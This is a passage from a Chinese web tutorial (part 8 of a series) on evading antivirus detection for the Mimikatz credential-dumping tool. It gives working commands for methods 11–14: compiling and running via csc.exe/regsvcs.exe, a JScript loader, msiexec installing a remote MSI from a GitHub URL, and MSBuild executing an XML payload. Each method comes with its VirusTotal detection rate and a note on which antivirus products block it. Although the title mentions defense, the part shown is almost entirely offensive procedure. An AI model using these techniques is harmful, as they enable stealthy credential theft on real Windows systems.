主页 > 网络知识 > Mimikatz的18种免杀姿势及防御策略(8)

Mimikatz的18种免杀姿势及防御策略(8)

再cmd执行

C:WindowsMicrosoft.NETFramework 2.0.50727csc.exe /r:System.EnterpriseServices.dll /out:katz.exe /keyfile:key.snk /unsafe katz.cs C:WindowsMicrosoft.NETFramework 2.0.50727 egsvcs.exe katz.exe

运行时需要管理员权限,而且360会拦截

 

Mimikatz的18种免杀姿势及防御策略

 

放行后可正常执行

 

Mimikatz的18种免杀姿势及防御策略

 

virustotal.com上katz.exe查杀率为35/73,略惨。

 

Mimikatz的18种免杀姿势及防御策略

 

方法12-JS加载mimikatz(VT查杀率22/59)

参考远控免杀专题(38)-白名单Rundll32.exe执行payload(VT免杀率22-58):https://mp.weixin.qq.com/s/rm**AWC6HmcphozfEZhRGA

这个是大佬已经做好的payload,可以直接进行使用。

用DotNetToJScript实现

https://github.com/tyranid/DotNetToJScript

mimikatz

https://raw.githubusercontent.com/TideSec/BypassAntiVirus/master/tools/mimikatz/mimikatz.js

执行cscript mimikatz.js,360会拦截。

 

Mimikatz的18种免杀姿势及防御策略

 

放行后可正常执行

 

Mimikatz的18种免杀姿势及防御策略

 

virustotal.com上mimikatz.js查杀率为22/59。

 

Mimikatz的18种免杀姿势及防御策略

 

方法13-msiexec加载mimikatz(VT查杀率25/60)

参考远控免杀专题(35)-白名单Msiexec.exe执行payload(VT免杀率27-60):https://mp.weixin.qq.com/s/XPrBK1Yh5ggO-PeK85mqcg

使用Advanced Installer生成msi文件。

远程执行

msiexec.exe /passive /i https://raw.githubusercontent.com/TideSec/BypassAntiVirus/master/tools/mimikatz/mimikatz.msi /norestart

 

Mimikatz的18种免杀姿势及防御策略

 

本地执行

msiexec /passive /i Mimikatz.msi

 

Mimikatz的18种免杀姿势及防御策略

 

virustotal.com上mimikatz.msi查杀率为25/60。

 

Mimikatz的18种免杀姿势及防御策略

 

方法14-白名单msbuild.exe加载(VT查杀率4/59)

可参考之前的远控免杀专题(34)-白名单MSBuild.exe执行payload(VT免杀率4-57):https://mp.weixin.qq.com/s/1WEglPXm1Q5n6T-c4OhhXA

下载mimikatz.xml

https://raw.githubusercontent.com/TideSec/BypassAntiVirus/master/tools/mimikatz/executes-mimikatz.xml

执行

C:WindowsMicrosoft.NETFramework64v4.0.30319msbuild.exe executes-mimikatz.xml

火绒会预警,360不会

 

Mimikatz的18种免杀姿势及防御策略

 

virustotal.com上executes-mimikatz.xml查杀率为4/59。

说点什么吧
  • 全部评论(0
    还没有评论,快来抢沙发吧!